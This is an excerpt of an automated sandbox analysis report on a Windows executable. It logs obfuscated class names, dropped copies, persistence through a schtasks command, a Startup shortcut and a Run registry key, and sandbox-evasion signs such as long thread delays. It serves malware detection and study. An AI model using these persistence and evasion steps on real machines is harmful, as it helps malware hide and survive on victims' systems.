              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, B2X6TIA6OwcjisGogX.cs | High entropy of concatenated method names: 'k2QqdjfgZ5', 'eLeq8Ftpnh', 'Jw97ikoIAC', 'i987pfwYMZ', 'vxu79ThvK9', 'bMJ7cynblv', 'K9d7OmOdpm', 'dmP73StVmr', 'XQc7g9wnpc', 'cIn7T1XoCF'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, JPU6JeZEfcOAh3VAxw.cs | High entropy of concatenated method names: 'FMgbTXjbCK', 'uqZb1Vs1nh', 'SuDbZAuWsr', 'cfrbWkUplv', 'crYbYVOVeH', 'PdCbi5XQT8', 'qiEbpGCZsq', 'Etyb9QT1qs', 'XwNbc3fkbI', 'z89bOi6iXU'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, BfRKGsxfmapLDnyJae.cs | High entropy of concatenated method names: 'MbSrafQdhs', 'WNYrNlajD9', 'JMUrqANN1W', 'OF1rkrPrwn', 'cGBrBHtKk2', 'CoYq58XgrI', 'aAnqEuqaSf', 'YQHqy03gBN', 'oC6qJSqequ', 'grPqfIOBvQ'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, rw6rw0BnvthyGxjk5e.cs | High entropy of concatenated method names: 'KqpwaCvyRb', 'GdUwmRTqhL', 'sPIwNeNjTg', 'e7Zw75gqvZ', 'fONwq8WGVq', 'XRRwraVqAf', 'uILwk3RPMY', 'c0qwBpt8qH', 'cMewQjfnRs', 'jTvwvXj1jG'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, G0rrHkR3Regm38HbYK.cs | High entropy of concatenated method names: 'hmRMkWu4X2', 'LSeMBE0Pxk', 'wAuMv3ak4X', 'UHnMu3d2X6', 'rGoMbgXKfR', 'BGsMnfmapL', 'RM4Zsa9v91jxrp3tyN', 'hy62Gm5BFHIFjtfOWS', 'DUNMMAYQlq', 'UXKMwmR6U4'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, etnqG0M40RuYQ2CGjgs.cs | High entropy of concatenated method names: 'ToString', 'pYyjPN0WPl', 'Fn4jl9uRBK', 'H9njAaFHsF', 'ir7jx6YOxy', 'tPkjYgC6i8', 'LgXjiJGs3G', 'oPYjpUIa4S', 'X1FpvL0waeBwGC0jlB7', 'H9FsVx0GUf3cpEH2BN3'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, X0CI17Nm2rK9soP4pW.cs | High entropy of concatenated method names: 'Dispose', 'lhKMfkGvBZ', 'wLZ4Yb88y8', 'c4VIJQdyrP', 'PTSMHyJ0i3', 'L9GMzXgcPq', 'ProcessDialogKey', 'lKv4L5r4yM', 'YRg4MaMpV6', 'c2a44F6kQq'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, IrSCmVMMhSAxy1sNwDY.cs | High entropy of concatenated method names: 'XxkoHW3QiY', 'U83ozFLryS', 'bFmjLKjL4X', 'kyBjMBjEty', 'DK9j4WDA5V', 'U4HjwOMsdE', 'itFjRC0vK1', 'GtEjaYOSkx', 'eQAjm6S772', 'NOtjNL9pKk'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, dWu4X2POSeE0PxkDow.cs | High entropy of concatenated method names: 'oD7NZBVV0S', 'AIWNWaldgO', 'qxkNFG9puw', 'fKgNDwWWJe', 'GLnN53mHdT', 'bW3NEP3ZyU', 'Q5tNyyPOWv', 'bpkNJAOnHj', 'LkxNfk38fL', 'BplNHAFPNF'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, S6kQq8H2YIZ3L9W7Iu.cs | High entropy of concatenated method names: 'tMho7YfbJ6', 'r6Goq8Adjx', 'nHZornjoec', 'pH3okUIbbd', 'rENot4OdO8', 'rHmoBKKgIR', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, A0S6FhlAu3ak4X5Hn3.cs | High entropy of concatenated method names: 'htt7IrJ3mw', 'B4s7K7lYDA', 'GOZ7PChdSj', 'Pdd7lCHrkH', 'udF7bJwLu9', 'sKk7nvupqW', 'pPJ7ecpFw1', 't1B7sOKSjM', 'r8P7t6D93Y', 'jGN7oi2djJ'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, DxVbSFEWu8YfBsCZIJ.cs | High entropy of concatenated method names: 'zoreJ9PuIV', 'rmweHajdJ2', 'icvsL2Ur4Q', 'JPbsM7QQEW', 'zUpeUjA7hS', 'Fahe1RdUB1', 'Ulue0lKtKh', 'TTseZXqNkm', 'AN0eW4FqNq', 'KM8eFJjY8k'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, l5r4yMfHRgaMpV6w2a.cs | High entropy of concatenated method names: 'VEdtxa5GFe', 'NuytYIbGuT', 'aXQtiuMxof', 'apntp4Rte9', 'UPvt9U26ia', 'XLqtciOh64', 'XnstOf9FPd', 'gKnt3hCetx', 'ii7tgosKho', 'znPtTuWFgo'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, cgS87n0bF9R7j9LBfg.cs | High entropy of concatenated method names: 'SkhVPu7f6k', 'g2iVlqVO2N', 'f4QVxFNQtO', 'UjdVYeXU67', 'WcEVp5uVer', 'xxxV9H1SA7', 'M7xVOJhJWj', 'bfMV3jTF4e', 'RsdVTId25Q', 'KW6VUWDu6S'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, RNpgfFMRE75cxe1a9ye.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'y8G2tr4KtS', 'AcX2oKYvAT', 'qnm2jRyMOv', 'oXH22sGkqe', 'IVd2GdxjUM', 'OwZ2Xax3wU', 'dpf2hbA0kp'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, KhXskcgjJb7WhBNB0e.cs | High entropy of concatenated method names: 'yWEkCYqyrk', 'RUokS7Qv7W', 'XCIk6se4hQ', 'vSZkIi8q9t', 'ef6kd1LsIb', 'UcPkKiZpLo', 'O67k8UvCQR', 'NlGkPfLSnO', 'pG6klcfFWj', 'aTPkAeRCHR'
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, Ai0pUZOnQWs6p8kWrU.cs | High entropy of concatenated method names: 'lXKkmhsAiC', 'xQvk7l1Ah7', 'uFvkrNBmvv', 'b60rH8fCuL', 'VcQrzARj3C', 'HRskLtRtXG', 'H3GkMXNjkK', 'kUEk41gDxi', 'F0dkwcEmO6', 'rZNkRhq6NB'
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | File created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe (dropped file)
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | File created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe (dropped file)

              Boot Survival

              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp"
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9758xBqgE1azKnB

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match File source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 7128, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: grjujyNaBLaKbU.exe PID: 888, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 7568, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 7868, type: MEMORYSTR
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe Memory allocated: 14C0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe Memory allocated: 2FE0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe Memory allocated: 2E00000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe Memory allocated: 9200000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe Memory allocated: A200000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe Memory allocated: A410000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe Memory allocated: B410000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe Memory allocated: 18F0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe Memory allocated: 32A0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe Memory allocated: 30B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe Memory allocated: 1090000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe Memory allocated: 2B00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe Memory allocated: 4B00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe Memory allocated: 8660000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe Memory allocated: 9660000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe Memory allocated: 9850000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe Memory allocated: A850000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe Memory allocated: 1480000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe Memory allocated: 2E60000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe Memory allocated: 4E60000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 1480000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 2DE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 4DE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 8A40000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 9A40000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 9C30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: AC30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 2F00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 3170000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 2F80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 940000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 23B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 43B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 8130000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 9130000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 9320000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: A320000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 2890000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 2AF0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Memory allocated: 2910000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6157
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3611
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe Window / User API: threadDelayed 2612
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe Window / User API: threadDelayed 7227
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe TID: 7156 Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe TID: 6240 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300 Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe TID: 7492 Thread sleep time: -32281802128991695s >= -30000s
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe TID: 5924 Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe TID: 7184 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe TID: 7428 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe TID: 7572 Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe TID: 7592 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe TID: 7728 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe TID: 7872 Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe TID: 7884 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe TID: 8108 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe File Volume queried: C:\ FullSizeInformation
